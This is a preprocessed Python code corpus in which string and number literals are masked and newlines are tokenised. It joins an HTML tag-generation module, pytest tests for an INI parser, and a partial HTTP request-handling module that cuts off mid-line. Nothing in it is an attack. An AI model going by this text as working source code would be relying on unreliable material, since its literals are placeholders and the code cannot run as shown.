Namespace = NamespaceMetaclass ( '<STR_LIT>' , ( object , ) , { <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : Tag , <EOL> '<STR_LIT>' : False , <EOL> } ) <EOL> class HtmlTag ( Tag ) : <EOL> def unicode ( self , indent = <NUM_LIT:2> ) : <EOL> l = [ ] <EOL> HtmlVisitor ( l . append , indent , shortempty = False ) . 
visit ( self ) <EOL> return u ( "<STR_LIT>" ) . join ( l ) <EOL> class html ( Namespace ) : <EOL> __tagclass__ = HtmlTag <EOL> __stickyname__ = True <EOL> __tagspec__ = dict ( [ ( x , <NUM_LIT:1> ) for x in ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) . split ( '<STR_LIT:U+002C>' ) if x ] ) <EOL> class Style ( object ) : <EOL> def __init__ ( self , ** kw ) : <EOL> for x , y in kw . items ( ) : <EOL> x = x . replace ( '<STR_LIT:_>' , '<STR_LIT:->' ) <EOL> setattr ( self , x , y ) <EOL> class raw ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , uniobj ) : <EOL> self . uniobj = uniobj <EOL> class SimpleUnicodeVisitor ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , write , indent = <NUM_LIT:0> , curindent = <NUM_LIT:0> , shortempty = True ) : <EOL> self . write = write <EOL> self . cache = { } <EOL> self . visited = { } <EOL> self . indent = indent <EOL> self . curindent = curindent <EOL> self . parents = [ ] <EOL> self . shortempty = shortempty <EOL> def visit ( self , node ) : <EOL> """<STR_LIT>""" <EOL> cls = node . __class__ <EOL> try : <EOL> visitmethod = self . cache [ cls ] <EOL> except KeyError : <EOL> for subclass in cls . __mro__ : <EOL> visitmethod = getattr ( self , subclass . __name__ , None ) <EOL> if visitmethod is not None : <EOL> break <EOL> else : <EOL> visitmethod = self . __object <EOL> self . cache [ cls ] = visitmethod <EOL> visitmethod ( node ) <EOL> def __object ( self , obj ) : <EOL> self . write ( escape ( unicode ( obj ) ) ) <EOL> def raw ( self , obj ) : <EOL> self . write ( obj . uniobj ) <EOL> def list ( self , obj ) : <EOL> assert id ( obj ) not in self . visited <EOL> self . visited [ id ( obj ) ] = <NUM_LIT:1> <EOL> for elem in obj : <EOL> self . visit ( elem ) <EOL> def Tag ( self , tag ) : <EOL> assert id ( tag ) not in self . visited <EOL> try : <EOL> tag . 
parent = self . parents [ - <NUM_LIT:1> ] <EOL> except IndexError : <EOL> tag . parent = None <EOL> self . visited [ id ( tag ) ] = <NUM_LIT:1> <EOL> tagname = getattr ( tag , '<STR_LIT>' , tag . __class__ . __name__ ) <EOL> if self . curindent and not self . _isinline ( tagname ) : <EOL> self . write ( "<STR_LIT:\n>" + u ( '<STR_LIT:U+0020>' ) * self . curindent ) <EOL> if tag : <EOL> self . curindent += self . indent <EOL> self . write ( u ( '<STR_LIT>' ) % ( tagname , self . attributes ( tag ) ) ) <EOL> self . parents . append ( tag ) <EOL> for x in tag : <EOL> self . visit ( x ) <EOL> self . parents . pop ( ) <EOL> self . write ( u ( '<STR_LIT>' ) % tagname ) <EOL> self . curindent -= self . indent <EOL> else : <EOL> nameattr = tagname + self . attributes ( tag ) <EOL> if self . _issingleton ( tagname ) : <EOL> self . write ( u ( '<STR_LIT>' ) % ( nameattr , ) ) <EOL> else : <EOL> self . write ( u ( '<STR_LIT>' ) % ( nameattr , tagname ) ) <EOL> def attributes ( self , tag ) : <EOL> attrlist = dir ( tag . attr ) <EOL> attrlist . sort ( ) <EOL> l = [ ] <EOL> for name in attrlist : <EOL> res = self . repr_attribute ( tag . attr , name ) <EOL> if res is not None : <EOL> l . append ( res ) <EOL> l . extend ( self . getstyle ( tag ) ) <EOL> return u ( "<STR_LIT>" ) . join ( l ) <EOL> def repr_attribute ( self , attrs , name ) : <EOL> if name [ : <NUM_LIT:2> ] != '<STR_LIT>' : <EOL> value = getattr ( attrs , name ) <EOL> if name . endswith ( '<STR_LIT:_>' ) : <EOL> name = name [ : - <NUM_LIT:1> ] <EOL> if isinstance ( value , raw ) : <EOL> insert = value . uniobj <EOL> else : <EOL> insert = escape ( unicode ( value ) ) <EOL> return '<STR_LIT>' % ( name , insert ) <EOL> def getstyle ( self , tag ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> styledict = tag . style . __dict__ <EOL> except AttributeError : <EOL> return [ ] <EOL> else : <EOL> stylelist = [ x + '<STR_LIT>' + y for x , y in styledict . items ( ) ] <EOL> return [ u ( '<STR_LIT>' ) % u ( '<STR_LIT>' ) . 
join ( stylelist ) ] <EOL> def _issingleton ( self , tagname ) : <EOL> """<STR_LIT>""" <EOL> return self . shortempty <EOL> def _isinline ( self , tagname ) : <EOL> """<STR_LIT>""" <EOL> return False <EOL> class HtmlVisitor ( SimpleUnicodeVisitor ) : <EOL> single = dict ( [ ( x , <NUM_LIT:1> ) for x in <EOL> ( '<STR_LIT>' <EOL> '<STR_LIT>' ) . split ( '<STR_LIT:U+002C>' ) ] ) <EOL> inline = dict ( [ ( x , <NUM_LIT:1> ) for x in <EOL> ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . split ( '<STR_LIT:U+0020>' ) ) ] ) <EOL> def repr_attribute ( self , attrs , name ) : <EOL> if name == '<STR_LIT>' : <EOL> value = getattr ( attrs , name ) <EOL> if value is None : <EOL> return <EOL> return super ( HtmlVisitor , self ) . repr_attribute ( attrs , name ) <EOL> def _issingleton ( self , tagname ) : <EOL> return tagname in self . single <EOL> def _isinline ( self , tagname ) : <EOL> return tagname in self . inline <EOL> class _escape : <EOL> def __init__ ( self ) : <EOL> self . escape = { <EOL> u ( '<STR_LIT:">' ) : u ( '<STR_LIT>' ) , u ( '<STR_LIT:<>' ) : u ( '<STR_LIT>' ) , u ( '<STR_LIT:>>' ) : u ( '<STR_LIT>' ) , <EOL> u ( '<STR_LIT:&>' ) : u ( '<STR_LIT>' ) , u ( "<STR_LIT:'>" ) : u ( '<STR_LIT>' ) , <EOL> } <EOL> self . charef_rex = re . compile ( u ( "<STR_LIT:|>" ) . join ( self . escape . keys ( ) ) ) <EOL> def _replacer ( self , match ) : <EOL> return self . escape [ match . group ( <NUM_LIT:0> ) ] <EOL> def __call__ ( self , ustring ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> ustring = unicode ( ustring ) <EOL> except UnicodeDecodeError : <EOL> ustring = unicode ( ustring , '<STR_LIT:utf-8>' , errors = '<STR_LIT:replace>' ) <EOL> return self . charef_rex . sub ( self . _replacer , ustring ) <EOL> escape = _escape ( ) </s>
<s> import py <EOL> import pytest <EOL> from py . _iniconfig import IniConfig , ParseError , __all__ as ALL <EOL> from py . _iniconfig import iscommentline <EOL> from textwrap import dedent <EOL> def pytest_generate_tests ( metafunc ) : <EOL> if '<STR_LIT:input>' in metafunc . funcargnames : <EOL> for name , ( input , expected ) in check_tokens . items ( ) : <EOL> metafunc . addcall ( id = name , funcargs = { <EOL> '<STR_LIT:input>' : input , <EOL> '<STR_LIT>' : expected , <EOL> } ) <EOL> elif hasattr ( metafunc . function , '<STR_LIT>' ) : <EOL> kwargs = metafunc . function . multi . kwargs <EOL> names , values = zip ( * kwargs . items ( ) ) <EOL> values = cartesian_product ( * values ) <EOL> for p in values : <EOL> metafunc . addcall ( funcargs = dict ( zip ( names , p ) ) ) <EOL> def cartesian_product ( L , * lists ) : <EOL> if not lists : <EOL> for x in L : <EOL> yield ( x , ) <EOL> else : <EOL> for x in L : <EOL> for y in cartesian_product ( lists [ <NUM_LIT:0> ] , * lists [ <NUM_LIT:1> : ] ) : <EOL> yield ( x , ) + y <EOL> check_tokens = { <EOL> '<STR_LIT>' : ( <EOL> '<STR_LIT>' , <EOL> [ ( <NUM_LIT:0> , '<STR_LIT>' , None , None ) ] <EOL> ) , <EOL> '<STR_LIT:value>' : ( <EOL> '<STR_LIT>' , <EOL> [ ( <NUM_LIT:0> , None , '<STR_LIT:value>' , '<STR_LIT:1>' ) ] <EOL> ) , <EOL> '<STR_LIT>' : ( <EOL> '<STR_LIT>' , <EOL> [ ( <NUM_LIT:0> , '<STR_LIT>' , None , None ) , ( <NUM_LIT:1> , '<STR_LIT>' , '<STR_LIT:value>' , '<STR_LIT:1>' ) ] <EOL> ) , <EOL> '<STR_LIT>' : ( <EOL> '<STR_LIT>' , <EOL> [ ( <NUM_LIT:0> , None , '<STR_LIT>' , '<STR_LIT>' ) ] <EOL> ) , <EOL> '<STR_LIT>' : ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> [ ( <NUM_LIT:0> , None , '<STR_LIT>' , '<STR_LIT>' ) ] <EOL> ) , <EOL> '<STR_LIT>' : ( <EOL> '<STR_LIT>' , <EOL> [ ( <NUM_LIT:0> , '<STR_LIT>' , None , None ) , ( <NUM_LIT:2> , '<STR_LIT>' , '<STR_LIT:value>' , '<STR_LIT:1>' ) ] <EOL> ) , <EOL> '<STR_LIT>' : ( <EOL> '<STR_LIT>' , <EOL> [ ] <EOL> ) , <EOL> '<STR_LIT>' : ( <EOL> '<STR_LIT>' , <EOL> [ 
( <NUM_LIT:0> , None , '<STR_LIT:value>' , '<STR_LIT:1>' ) ] <EOL> ) , <EOL> '<STR_LIT>' : ( <EOL> '<STR_LIT>' , <EOL> [ ( <NUM_LIT:0> , '<STR_LIT>' , None , None ) ] <EOL> ) , <EOL> '<STR_LIT>' : ( <EOL> '<STR_LIT>' , <EOL> [ ] <EOL> ) , <EOL> '<STR_LIT>' : ( <EOL> '<STR_LIT>' , <EOL> [ ( <NUM_LIT:0> , '<STR_LIT>' , None , None ) ] <EOL> ) , <EOL> '<STR_LIT>' : ( <EOL> '<STR_LIT>' , <EOL> [ ( <NUM_LIT:0> , None , '<STR_LIT:name>' , '<STR_LIT>' ) ] <EOL> ) , <EOL> '<STR_LIT>' : ( <EOL> '<STR_LIT>' , <EOL> [ ( <NUM_LIT:0> , None , '<STR_LIT:value>' , '<STR_LIT>' ) ] <EOL> ) , <EOL> '<STR_LIT>' : ( <EOL> '<STR_LIT>' , <EOL> [ ( <NUM_LIT:0> , None , '<STR_LIT:name>' , '<STR_LIT:y>' ) ] <EOL> ) , <EOL> '<STR_LIT>' : ( <EOL> '<STR_LIT>' , <EOL> [ ( <NUM_LIT:0> , None , '<STR_LIT:value>' , '<STR_LIT>' ) ] <EOL> ) , <EOL> '<STR_LIT>' : ( <EOL> '<STR_LIT>' , <EOL> [ ( <NUM_LIT:0> , None , '<STR_LIT:value>' , '<STR_LIT>' ) ] <EOL> ) , <EOL> } <EOL> def parse ( input ) : <EOL> ini = object . __new__ ( IniConfig ) <EOL> ini . path = "<STR_LIT>" <EOL> return ini . _parse ( input . splitlines ( True ) ) <EOL> def parse_a_error ( input ) : <EOL> return py . test . raises ( ParseError , parse , input ) <EOL> def test_tokenize ( input , expected ) : <EOL> parsed = parse ( input ) <EOL> assert parsed == expected <EOL> def test_parse_empty ( ) : <EOL> parsed = parse ( "<STR_LIT>" ) <EOL> assert not parsed <EOL> ini = IniConfig ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> assert not ini . sections <EOL> def test_ParseError ( ) : <EOL> e = ParseError ( "<STR_LIT:filename>" , <NUM_LIT:0> , "<STR_LIT:hello>" ) <EOL> assert str ( e ) == "<STR_LIT>" <EOL> def test_continuation_needs_perceeding_token ( ) : <EOL> excinfo = parse_a_error ( '<STR_LIT>' ) <EOL> assert excinfo . value . lineno == <NUM_LIT:0> <EOL> def test_continuation_cant_be_after_section ( ) : <EOL> excinfo = parse_a_error ( '<STR_LIT>' ) <EOL> assert excinfo . value . 
lineno == <NUM_LIT:1> <EOL> def test_section_cant_be_empty ( ) : <EOL> excinfo = parse_a_error ( '<STR_LIT>' ) <EOL> @ py . test . mark . multi ( line = [ <EOL> '<STR_LIT>' , <EOL> ] ) <EOL> def test_error_on_weird_lines ( line ) : <EOL> parse_a_error ( line ) <EOL> def test_iniconfig_from_file ( tmpdir ) : <EOL> path = tmpdir / '<STR_LIT>' <EOL> path . write ( '<STR_LIT>' ) <EOL> config = IniConfig ( path = path ) <EOL> assert list ( config . sections ) == [ '<STR_LIT>' ] <EOL> config = IniConfig ( path , "<STR_LIT>" ) <EOL> assert list ( config . sections ) == [ '<STR_LIT>' ] <EOL> py . test . raises ( TypeError , "<STR_LIT>" ) <EOL> def test_iniconfig_section_first ( tmpdir ) : <EOL> excinfo = py . test . raises ( ParseError , """<STR_LIT>""" ) <EOL> assert excinfo . value . msg == "<STR_LIT>" <EOL> def test_iniconig_section_duplicate_fails ( ) : <EOL> excinfo = py . test . raises ( ParseError , r"""<STR_LIT>""" ) <EOL> assert '<STR_LIT>' in str ( excinfo . value ) <EOL> def test_iniconfig_duplicate_key_fails ( ) : <EOL> excinfo = py . test . raises ( ParseError , r"""<STR_LIT>""" ) <EOL> assert '<STR_LIT>' in str ( excinfo . value ) <EOL> def test_iniconfig_lineof ( ) : <EOL> config = IniConfig ( "<STR_LIT>" , data = <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> assert config . lineof ( '<STR_LIT>' ) is None <EOL> assert config . lineof ( '<STR_LIT>' ) == <NUM_LIT:1> <EOL> assert config . lineof ( '<STR_LIT>' ) == <NUM_LIT:3> <EOL> assert config . lineof ( '<STR_LIT>' , '<STR_LIT:value>' ) == <NUM_LIT:2> <EOL> assert config . lineof ( '<STR_LIT>' , '<STR_LIT:value>' ) == <NUM_LIT:5> <EOL> assert config [ '<STR_LIT>' ] . lineof ( '<STR_LIT:value>' ) == <NUM_LIT:2> <EOL> assert config [ '<STR_LIT>' ] . lineof ( '<STR_LIT:value>' ) == <NUM_LIT:5> <EOL> def test_iniconfig_get_convert ( ) : <EOL> config = IniConfig ( "<STR_LIT:x>" , data = '<STR_LIT>' ) <EOL> assert config . 
get ( '<STR_LIT>' , '<STR_LIT:int>' ) == '<STR_LIT:1>' <EOL> assert config . get ( '<STR_LIT>' , '<STR_LIT:int>' , convert = int ) == <NUM_LIT:1> <EOL> def test_iniconfig_get_missing ( ) : <EOL> config = IniConfig ( "<STR_LIT:x>" , data = '<STR_LIT>' ) <EOL> assert config . get ( '<STR_LIT>' , '<STR_LIT>' , default = <NUM_LIT:1> ) == <NUM_LIT:1> <EOL> assert config . get ( '<STR_LIT>' , '<STR_LIT>' ) is None <EOL> def test_section_get ( ) : <EOL> config = IniConfig ( "<STR_LIT:x>" , data = '<STR_LIT>' ) <EOL> section = config [ '<STR_LIT>' ] <EOL> assert section . get ( '<STR_LIT:value>' , convert = int ) == <NUM_LIT:1> <EOL> assert section . get ( '<STR_LIT:value>' , <NUM_LIT:1> ) == "<STR_LIT:1>" <EOL> assert section . get ( '<STR_LIT>' , <NUM_LIT:2> ) == <NUM_LIT:2> <EOL> def test_missing_section ( ) : <EOL> config = IniConfig ( "<STR_LIT:x>" , data = '<STR_LIT>' ) <EOL> py . test . raises ( KeyError , '<STR_LIT>' ) <EOL> def test_section_getitem ( ) : <EOL> config = IniConfig ( "<STR_LIT:x>" , data = '<STR_LIT>' ) <EOL> assert config [ '<STR_LIT>' ] [ '<STR_LIT:value>' ] == '<STR_LIT:1>' <EOL> assert config [ '<STR_LIT>' ] [ '<STR_LIT:value>' ] == '<STR_LIT:1>' <EOL> def test_section_iter ( ) : <EOL> config = IniConfig ( "<STR_LIT:x>" , data = '<STR_LIT>' ) <EOL> names = list ( config [ '<STR_LIT>' ] ) <EOL> assert names == [ '<STR_LIT:value>' ] <EOL> items = list ( config [ '<STR_LIT>' ] . items ( ) ) <EOL> assert items == [ ( '<STR_LIT:value>' , '<STR_LIT:1>' ) ] <EOL> def test_config_iter ( ) : <EOL> config = IniConfig ( "<STR_LIT>" , data = dedent ( '''<STR_LIT>''' ) ) <EOL> l = list ( config ) <EOL> assert len ( l ) == <NUM_LIT:2> <EOL> assert l [ <NUM_LIT:0> ] . name == '<STR_LIT>' <EOL> assert l [ <NUM_LIT:0> ] [ '<STR_LIT:value>' ] == '<STR_LIT:1>' <EOL> assert l [ <NUM_LIT:1> ] . 
name == '<STR_LIT>' <EOL> assert l [ <NUM_LIT:1> ] [ '<STR_LIT:value>' ] == '<STR_LIT:2>' <EOL> def test_config_contains ( ) : <EOL> config = IniConfig ( "<STR_LIT>" , data = dedent ( '''<STR_LIT>''' ) ) <EOL> assert '<STR_LIT>' not in config <EOL> assert '<STR_LIT>' in config <EOL> assert '<STR_LIT>' in config <EOL> def test_iter_file_order ( ) : <EOL> config = IniConfig ( "<STR_LIT>" , data = """<STR_LIT>""" ) <EOL> l = list ( config ) <EOL> secnames = [ x . name for x in l ] <EOL> assert secnames == [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> assert list ( config [ '<STR_LIT>' ] ) == [ '<STR_LIT:value>' , '<STR_LIT>' ] <EOL> assert list ( config [ '<STR_LIT>' ] ) == [ '<STR_LIT:a>' , '<STR_LIT:b>' ] <EOL> def test_example_pypirc ( ) : <EOL> config = IniConfig ( "<STR_LIT>" , data = dedent ( '''<STR_LIT>''' ) ) <EOL> distutils , pypi , other = list ( config ) <EOL> assert distutils [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert pypi [ '<STR_LIT>' ] == '<STR_LIT>' <EOL> assert pypi [ '<STR_LIT:username>' ] == '<STR_LIT>' <EOL> assert pypi [ '<STR_LIT:password>' ] == '<STR_LIT>' <EOL> assert [ '<STR_LIT>' , '<STR_LIT:username>' , '<STR_LIT:password>' ] == list ( other ) <EOL> def test_api_import ( ) : <EOL> assert ALL == [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> @ pytest . mark . parametrize ( "<STR_LIT>" , [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] ) <EOL> def test_iscommentline_true ( line ) : <EOL> assert iscommentline ( line ) </s>
<s> import base64 <EOL> import cgi <EOL> import Cookie <EOL> import os <EOL> import StringIO <EOL> import tempfile <EOL> import urlparse <EOL> import stash <EOL> from utils import HTTPException <EOL> missing = object ( ) <EOL> class Server ( object ) : <EOL> """<STR_LIT>""" <EOL> config = None <EOL> def __init__ ( self , request ) : <EOL> self . _stash = None <EOL> self . _request = request <EOL> @ property <EOL> def stash ( self ) : <EOL> if self . _stash is None : <EOL> address , authkey = stash . load_env_config ( ) <EOL> self . _stash = stash . Stash ( self . _request . url_parts . path , address , authkey ) <EOL> return self . _stash <EOL> class InputFile ( object ) : <EOL> max_buffer_size = <NUM_LIT> * <NUM_LIT> <EOL> def __init__ ( self , rfile , length ) : <EOL> """<STR_LIT>""" <EOL> self . _file = rfile <EOL> self . length = length <EOL> self . _file_position = <NUM_LIT:0> <EOL> if length > self . max_buffer_size : <EOL> self . _buf = tempfile . TemporaryFile ( mode = "<STR_LIT>" ) <EOL> else : <EOL> self . _buf = StringIO . StringIO ( ) <EOL> @ property <EOL> def _buf_position ( self ) : <EOL> rv = self . _buf . tell ( ) <EOL> assert rv <= self . _file_position <EOL> return rv <EOL> def read ( self , bytes = - <NUM_LIT:1> ) : <EOL> assert self . _buf_position <= self . _file_position <EOL> if bytes < <NUM_LIT:0> : <EOL> bytes = self . length - self . _buf_position <EOL> bytes_remaining = min ( bytes , self . length - self . _buf_position ) <EOL> if bytes_remaining == <NUM_LIT:0> : <EOL> return "<STR_LIT>" <EOL> if self . _buf_position != self . _file_position : <EOL> buf_bytes = min ( bytes_remaining , self . _file_position - self . _buf_position ) <EOL> old_data = self . _buf . read ( buf_bytes ) <EOL> bytes_remaining -= buf_bytes <EOL> else : <EOL> old_data = "<STR_LIT>" <EOL> assert self . _buf_position == self . _file_position , ( <EOL> "<STR_LIT>" % <EOL> ( self . _buf_position , self . _file_position ) ) <EOL> new_data = self . _file . 
read ( bytes_remaining ) <EOL> self . _buf . write ( new_data ) <EOL> self . _file_position += bytes_remaining <EOL> assert self . _buf_position == self . _file_position , ( <EOL> "<STR_LIT>" % <EOL> ( self . _buf_position , self . _file_position ) ) <EOL> return old_data + new_data <EOL> def tell ( self ) : <EOL> return self . _buf_position <EOL> def seek ( self , offset ) : <EOL> if offset > self . length or offset < <NUM_LIT:0> : <EOL> raise ValueError <EOL> if offset <= self . _file_position : <EOL> self . _buf . seek ( offset ) <EOL> else : <EOL> self . read ( offset - self . _file_position ) <EOL> def readline ( self , max_bytes = None ) : <EOL> if max_bytes is None : <EOL> max_bytes = self . length - self . _buf_position <EOL> if self . _buf_position < self . _file_position : <EOL> data = self . _buf . readline ( max_bytes ) <EOL> if data . endswith ( "<STR_LIT:\n>" ) or len ( data ) == max_bytes : <EOL> return data <EOL> else : <EOL> data = "<STR_LIT>" <EOL> assert self . _buf_position == self . _file_position <EOL> initial_position = self . _file_position <EOL> found = False <EOL> buf = [ ] <EOL> max_bytes -= len ( data ) <EOL> while not found : <EOL> readahead = self . read ( min ( <NUM_LIT:2> , max_bytes ) ) <EOL> max_bytes -= len ( readahead ) <EOL> for i , c in enumerate ( readahead ) : <EOL> if c == "<STR_LIT:\n>" : <EOL> buf . append ( readahead [ : i + <NUM_LIT:1> ] ) <EOL> found = True <EOL> break <EOL> if not found : <EOL> buf . append ( readahead ) <EOL> if not readahead or not max_bytes : <EOL> break <EOL> new_data = "<STR_LIT>" . join ( buf ) <EOL> data += new_data <EOL> self . seek ( initial_position + len ( new_data ) ) <EOL> return data <EOL> def readlines ( self ) : <EOL> rv = [ ] <EOL> while True : <EOL> data = self . readline ( ) <EOL> if data : <EOL> rv . append ( data ) <EOL> else : <EOL> break <EOL> return rv <EOL> def next ( self ) : <EOL> data = self . 
readline ( ) <EOL> if data : <EOL> return data <EOL> else : <EOL> raise StopIteration <EOL> def __iter__ ( self ) : <EOL> return self <EOL> class Request ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , request_handler ) : <EOL> self . doc_root = request_handler . server . router . doc_root <EOL> self . route_match = None <EOL> self . protocol_version = request_handler . protocol_version <EOL> self . method = request_handler . command <EOL> scheme = request_handler . server . scheme <EOL> host = request_handler . headers . get ( "<STR_LIT>" ) <EOL> port = request_handler . server . server_address [ <NUM_LIT:1> ] <EOL> if host is None : <EOL> host = request_handler . server . server_address [ <NUM_LIT:0> ] <EOL> else : <EOL> if "<STR_LIT::>" in host : <EOL> host , port = host . split ( "<STR_LIT::>" , <NUM_LIT:1> ) <EOL> self . request_path = request_handler . path <EOL> self . url_base = "<STR_LIT:/>" <EOL> if self . request_path . startswith ( scheme + "<STR_LIT>" ) : <EOL> self . url = request_handler . path <EOL> else : <EOL> self . url = "<STR_LIT>" % ( scheme , <EOL> host , <EOL> port , <EOL> self . request_path ) <EOL> self . url_parts = urlparse . urlsplit ( self . url ) <EOL> self . _raw_headers = request_handler . headers <EOL> self . request_line = request_handler . raw_requestline <EOL> self . _headers = None <EOL> self . raw_input = InputFile ( request_handler . rfile , <EOL> int ( self . headers . get ( "<STR_LIT>" , <NUM_LIT:0> ) ) ) <EOL> self . _body = None <EOL> self . _GET = None <EOL> self . _POST = None <EOL> self . _cookies = None <EOL> self . _auth = None <EOL> self . server = Server ( self ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( self . method , self . url ) <EOL> @ property <EOL> def GET ( self ) : <EOL> if self . _GET is None : <EOL> params = urlparse . parse_qsl ( self . url_parts . query , keep_blank_values = True ) <EOL> self . _GET = MultiDict ( ) <EOL> for key , value in params : <EOL> self . _GET . 
add ( key , value ) <EOL> return self . _GET <EOL> @ property <EOL> def POST ( self ) : <EOL> if self . _POST is None : <EOL> pos = self . raw_input . tell ( ) <EOL> self . raw_input . seek ( <NUM_LIT:0> ) <EOL> fs = cgi . FieldStorage ( fp = self . raw_input , <EOL> environ = { "<STR_LIT>" : self . method } , <EOL> headers = self . headers , <EOL> keep_blank_values = True ) <EOL> self . _POST = MultiDict . from_field_storage ( fs ) <EOL> self . raw_input . seek ( pos ) <EOL> return self . _POST <EOL> @ property <EOL> def cookies ( self ) : <EOL> if self . _cookies is None : <EOL> parser = Cookie . BaseCookie ( ) <EOL> cookie_headers = self . headers . get ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> parser . load ( cookie_headers ) <EOL> cookies = Cookies ( ) <EOL> for key , value in parser . iteritems ( ) : <EOL> cookies [ key ] = CookieValue ( value ) <EOL> self . _cookies = cookies <EOL> return self . _cookies <EOL> @ property <EOL> def headers ( self ) : <EOL> if self . _headers is None : <EOL> self . _headers = RequestHeaders ( self . _raw_headers ) <EOL> return self . _headers <EOL> @ property <EOL> def body ( self ) : <EOL> if self . _body is None : <EOL> pos = self . raw_input . tell ( ) <EOL> self . raw_input . seek ( <NUM_LIT:0> ) <EOL> self . _body = self . raw_input . read ( ) <EOL> self . raw_input . seek ( pos ) <EOL> return self . _body <EOL> @ property <EOL> def auth ( self ) : <EOL> if self . _auth is None : <EOL> self . _auth = Authentication ( self . headers ) <EOL> return self . _auth <EOL> class RequestHeaders ( dict ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , items ) : <EOL> for key , value in zip ( items . keys ( ) , items . values ( ) ) : <EOL> key = key . lower ( ) <EOL> if key in self : <EOL> self [ key ] . append ( value ) <EOL> else : <EOL> dict . __setitem__ ( self , key , [ value ] ) <EOL> def __getitem__ ( self , key ) : <EOL> """<STR_LIT>""" <EOL> values = dict . __getitem__ ( self , key . 
lower ( ) ) <EOL> if len ( values ) == <NUM_LIT:1> : <EOL> return values [ <NUM_LIT:0> ] <EOL> else : <EOL> return "<STR_LIT:U+002CU+0020>" . join ( values ) <EOL> def __setitem__ ( self , name , value ) : <EOL> raise Exception <EOL> def get ( self , key , default = None ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return self [ key ] <EOL> except KeyError : <EOL> return default <EOL> def get_list ( self , key , default = missing ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return dict . __getitem__ ( self , key . lower ( ) ) <EOL> except KeyError : <EOL> if default is not missing : <EOL> return default <EOL> else : <EOL> raise <EOL> def __contains__ ( self , key ) : <EOL> return dict . __contains__ ( self , key . lower ( ) ) <EOL> def iteritems ( self ) : <EOL> for item in self : <EOL> yield item , self [ item ] <EOL> def itervalues ( self ) : <EOL> for item in self : <EOL> yield self [ item ] <EOL> class CookieValue ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , morsel ) : <EOL> self . key = morsel . key <EOL> self . value = morsel . value <EOL> for attr in [ "<STR_LIT>" , "<STR_LIT:path>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT:version>" , "<STR_LIT>" ] : <EOL> setattr ( self , attr . replace ( "<STR_LIT:->" , "<STR_LIT:_>" ) , morsel [ attr ] ) <EOL> self . _str = morsel . OutputString ( ) <EOL> def __str__ ( self ) : <EOL> return self . _str <EOL> def __repr__ ( self ) : <EOL> return self . _str <EOL> def __eq__ ( self , other ) : <EOL> """<STR_LIT>""" <EOL> if hasattr ( other , "<STR_LIT:value>" ) : <EOL> return self . value == other . value <EOL> return self . value == other <EOL> class MultiDict ( dict ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> pass <EOL> def __setitem__ ( self , name , value ) : <EOL> dict . __setitem__ ( self , name , [ value ] ) <EOL> def add ( self , name , value ) : <EOL> if name in self : <EOL> dict . __getitem__ ( self , name ) . 
append ( value ) <EOL> else : <EOL> dict . __setitem__ ( self , name , [ value ] ) <EOL> def __getitem__ ( self , key ) : <EOL> """<STR_LIT>""" <EOL> return self . first ( key ) <EOL> def first ( self , key , default = missing ) : <EOL> """<STR_LIT>""" <EOL> if key in self and dict . __getitem__ ( self , key ) : <EOL> return dict . __getitem__ ( self , key ) [ <NUM_LIT:0> ] <EOL> elif default is not missing : <EOL> return default <EOL> raise KeyError <EOL> def last ( self , key , default = missing ) : <EOL> """<STR_LIT>""" <EOL> if key in self and dict . __getitem__ ( self , key ) : <EOL> return dict . __getitem__ ( self , key ) [ - <NUM_LIT:1> ] <EOL> elif default is not missing : <EOL> return default <EOL> raise KeyError <EOL> def get_list ( self , key ) : <EOL> """<STR_LIT>""" <EOL> return dict . __getitem__ ( self , key ) <EOL> @ classmethod <EOL> def from_field_storage ( cls , fs ) : <EOL> self = cls ( ) <EOL> if fs . list is None : <EOL> return self <EOL> for key in fs : <EOL> values = fs [ key ] <EOL> if not isinstance ( values , list ) : <EOL> values = [ values ] <EOL> for value in values : <EOL> if value . filename : <EOL> value = value <EOL> else : <EOL> value = value . value <EOL> self . add ( key , value ) <EOL> return self <EOL> class Cookies ( MultiDict ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> pass <EOL> def __getitem__ ( self , key ) : <EOL> return self . last ( key ) <EOL> class Authentication ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , headers ) : <EOL> self . username = None <EOL> self . password = None <EOL> auth_schemes = { "<STR_LIT>" : self . decode_basic } <EOL> if "<STR_LIT>" in headers : <EOL> header = headers . get ( "<STR_LIT>" ) <EOL> auth_type , data = header . split ( "<STR_LIT:U+0020>" , <NUM_LIT:1> ) <EOL> if auth_type in auth_schemes : <EOL> self . username , self . 
